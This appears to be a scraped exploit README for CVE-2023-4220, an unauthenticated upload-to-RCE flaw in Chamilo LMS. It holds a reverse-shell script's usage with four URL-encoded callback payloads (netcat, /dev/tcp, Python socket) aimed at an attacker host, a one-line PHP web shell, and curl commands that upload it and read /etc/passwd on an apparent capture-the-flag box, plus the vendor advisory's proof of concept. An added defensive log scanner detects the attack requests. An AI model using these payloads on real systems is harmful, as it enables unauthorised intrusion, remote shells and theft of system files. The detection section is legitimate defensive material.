## https://sploitus.com/exploit?id=98C56FCF-97F3-56BA-B6E6-ECD022931F60
<h1>CVE-2023-4220 Exploit</h1>

<h2>Chamilo LMS Unauthenticated Big Upload File Remote Code Execution</h2>

--------------------------------------------------------

<h2>Usage cve-2023-4220.sh</h2>

`./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>`

`./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1`

```
./cve-2023-4220.sh -h                                 

Usage for RevShell: ./cve-2023-4220.sh <Target-URL> <Target-Port> <Local-HOST> <Local-IP> <Payload>

Example: ./cve-2023-4220.sh lms.test.htb 80 10.10.14.14 80 1

Payload: 1 == rm%20%2Ftmp%2Ff%3Bmkfifo%20%2Ftmp%2Ff%3Bcat%20%2Ftmp%2Ff%7Csh%20-i%202%3E%261%7Cnc%2010.10.10.10%209001%20%3E%2Ftmp%2Ff

Payload: 2 == sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.10.10.10%2F9001%200%3E%261

Payload: 3 == nc%2010.10.10.10%209001%20-e%20sh

Payload: 4 == python3%20-c%20%27import%20os%2Cpty%2Csocket%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28%2210.10.10.10%22%2C9001%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cf%29for%20f%20in%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27

Payload: 5 == Enter own Payload:
```
![Example](/permx033.png)

![Example](/permx028.png)

![Example](/permx030.png)

--------------------------------------------------------

<h2>Get RCE</h2>

```
echo '<?php system($_GET["jiji"]);  ?>' > jiji.php

curl -F 'bigUploadFile=@jiji.php' 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=id'

curl 'http://lms.permx.htb/main/inc/lib/javascript/bigupload/files/jiji.php?jiji=cat+/etc/passwd'
```

![Example](/permx034.png)

![Example](/permx035.png)
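For defenders, the two requests above leave a recognisable trace in the web server's access log: a POST to `bigUpload.php?action=post-unsupported`, followed by a request for a script under `bigupload/files/`. The following is an added example, not part of the original repository, that flags both patterns. It assumes Apache/nginx Combined Log Format; the sample log lines, the file names in them and the extension list are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Paths taken from the requests shown above, lower-cased for matching.
UPLOAD_ENDPOINT = "/main/inc/lib/javascript/bigupload/inc/bigupload.php"
FILES_DIR = "/main/inc/lib/javascript/bigupload/files/"
# Extensions a PHP-enabled server may pass to the interpreter (assumed list).
SCRIPT_EXT = re.compile(r"\.(php\d?|phtml|phar)$")
# Combined Log Format: ip ident user [time] "METHOD target PROTO" status size
LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) ')

def classify(line):
    """Return (kind, ip, time, target) for a suspicious request, else None."""
    m = LINE.match(line)
    if not m:
        return None
    ip, when, method, target, status = m.groups()
    url = urlsplit(target)
    path = unquote(url.path).lower()
    if method == "POST" and path.endswith(UPLOAD_ENDPOINT):
        if parse_qs(url.query).get("action") == ["post-unsupported"]:
            return ("upload", ip, when, target)
    if FILES_DIR in path and SCRIPT_EXT.search(path):
        # 2xx means the server answered for a script in the upload directory.
        kind = "script-served" if status.startswith("2") else "script-probe"
        return (kind, ip, when, target)
    return None

def scan(lines):
    """Classify every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]

# Constructed sample log lines (documentation IP ranges, made-up file names).
BASE = "/main/inc/lib/javascript/bigupload"
SAMPLE = [
    f'203.0.113.5 - - [01/Jan/2024:10:00:00 +0000] "POST {BASE}/inc/bigUpload.php?action=post-unsupported HTTP/1.1" 200 40',
    f'203.0.113.5 - - [01/Jan/2024:10:00:05 +0000] "GET {BASE}/files/sample.php?x=1 HTTP/1.1" 200 54',
    f'198.51.100.7 - - [01/Jan/2024:10:01:00 +0000] "GET {BASE}/files/notes.pdf HTTP/1.1" 200 1000',
    f'198.51.100.7 - - [01/Jan/2024:10:02:00 +0000] "GET {BASE}/files/gone.PHP HTTP/1.1" 404 196',
    '198.51.100.7 - - [01/Jan/2024:10:03:00 +0000] "GET /index.php HTTP/1.1" 200 1000',
]

if __name__ == "__main__":
    for kind, ip, when, target in scan(SAMPLE):
        print(f"{when}  {ip:<15}  {kind:<13}  {target}")
```

A `script-served` hit from the same client shortly after an `upload` hit is the sequence to prioritise for triage; any script file present in `bigupload/files/` on disk is worth checking regardless of what the log shows.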

--------------------------------------------------------

<h2>Usage cve-2023-4220.py</h2>

![Example](/permx036.png)

--------------------------------------------------------

**Source: https://starlabs.sg/advisories/23/23-4220/**

```
$ echo '<?php system("id"); ?>' > rce.php
$ curl -F 'bigUploadFile=@rce.php' 'http://<chamilo>/main/inc/lib/javascript/bigupload/inc/bigUpload.php?action=post-unsupported'
The file has successfully been uploaded.
$ curl 'http://<chamilo>/main/inc/lib/javascript/bigupload/files/rce.php'
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```